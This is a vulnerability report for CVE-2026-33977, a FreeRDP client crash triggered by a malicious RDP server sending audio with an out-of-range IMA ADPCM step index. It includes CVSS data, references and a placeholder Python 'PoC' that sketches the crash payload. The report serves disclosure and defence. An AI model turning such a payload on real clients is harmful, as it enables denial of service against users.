Security Vulnerability Report
CVE-2026-33977 CVSS 6.5 MEDIUM

CVE-2026-33977

Published: 2026-03-30 22:16:19
Last Modified: 2026-04-01 20:05:50

Description

FreeRDP is a free implementation of the Remote Desktop Protocol. Prior to version 3.24.2, a malicious RDP server can crash the FreeRDP client by sending audio data in IMA ADPCM format with an invalid initial step index value (>= 89). The unvalidated step index is read directly from the network and used to index into an 89-entry lookup table, triggering a WINPR_ASSERT() failure and process abort via SIGABRT. This affects any FreeRDP client that has audio redirection (RDPSND) enabled, which is the default configuration. This issue has been patched in version 3.24.2.

CVSS Details

CVSS Score: 6.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:freerdp:freerdp:*:*:*:*:*:*:*:* - VULNERABLE
FreeRDP < 3.24.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
# PoC for CVE-2026-33977: FreeRDP Client Crash via Malicious Audio Data
# This script demonstrates how a malicious RDP server could trigger the crash.
# Conceptual implementation using a library like impacket.
import sys


def send_malicious_audio_packet(rdp_connection):
    """
    Simulates sending a malicious IMA ADPCM audio packet to the FreeRDP client.
    """
    # 1. Negotiate Audio Output (RDPSND) and IMA ADPCM format
    # (Assuming negotiation has happened earlier in the connection)

    # 2. Construct the malicious payload
    # The vulnerability is triggered by the 'initial step index' in the audio data.
    # Valid range for the index table is 0-88.
    # Setting it to 89 or higher triggers the assert.
    malicious_step_index = 89  # Invalid value

    # Placeholder for the rest of the audio data
    audio_data_padding = b'\x00' * 100

    # Construct the raw packet (Simplified structure)
    # Format: [Step Index (1 byte)] [Audio Data]
    payload = bytes([malicious_step_index]) + audio_data_padding

    print(f"[*] Sending malicious audio packet with step index: {malicious_step_index}")

    # 3. Send to the connected client
    try:
        rdp_connection.send_channel_data("rdpsnd", payload)
        print("[+] Packet sent. Client should crash due to WINPR_ASSERT failure.")
    except Exception as e:
        print(f"[-] Error sending packet: {e}")


if __name__ == "__main__":
    # This is a conceptual representation.
    # In a real scenario, you would use a modified RDP server library.
    print("CVE-2026-33977 PoC: FreeRDP IMA ADPCM Index Crash")
    print("Requires a setup where a client connects to this server.")
```

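References

Patch commit: https://github.com/FreeRDP/FreeRDP/commit/9be3f03d94a50892fd58a9f7dee72b2313c69b47
Vendor advisory (GHSA-8f2g-3q27-6xm5): https://github.com/FreeRDP/FreeRDP/security/advisories/GHSA-8f2g-3q27-6xm5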

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-33977", "sourceIdentifier": "[email protected]", "published": "2026-03-30T22:16:19.117", "lastModified": "2026-04-01T20:05:49.837", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "FreeRDP is a free implementation of the Remote Desktop Protocol. Prior to version 3.24.2, a malicious RDP server can crash the FreeRDP client by sending audio data in IMA ADPCM format with an invalid initial step index value (>= 89). The unvalidated step index is read directly from the network and used to index into a 89-entry lookup table, triggering a WINPR_ASSERT() failure and process abort via SIGABRT. This affects any FreeRDP client that has audio redirection (RDPSND) enabled, which is the default configuration. This issue has been patched in version 3.24.2."}, {"lang": "es", "value": "FreeRDP es una implementación gratuita del Protocolo de Escritorio Remoto. Antes de la versión 3.24.2, un servidor RDP malicioso puede provocar el fallo del cliente FreeRDP al enviar datos de audio en formato IMA ADPCM con un valor de índice de paso inicial no válido (>= 89). El índice de paso no validado se lee directamente de la red y se utiliza para indexar una tabla de búsqueda de 89 entradas, lo que desencadena un fallo de WINPR_ASSERT() y la interrupción del proceso a través de SIGABRT. Esto afecta a cualquier cliente FreeRDP que tenga la redirección de audio (RDPSND) habilitada, que es la configuración predeterminada. Este problema ha sido parcheado en la versión 3.24.2."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE",
"integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-617"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:freerdp:freerdp:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.24.2", "matchCriteriaId": "03FF152C-C651-4586-8958-1555D9797516"}]}]}], "references": [{"url": "https://github.com/FreeRDP/FreeRDP/commit/9be3f03d94a50892fd58a9f7dee72b2313c69b47", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/FreeRDP/FreeRDP/security/advisories/GHSA-8f2g-3q27-6xm5", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Patch", "Vendor Advisory"]}, {"url": "https://github.com/FreeRDP/FreeRDP/security/advisories/GHSA-8f2g-3q27-6xm5", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Mitigation", "Patch", "Vendor Advisory"]}]}}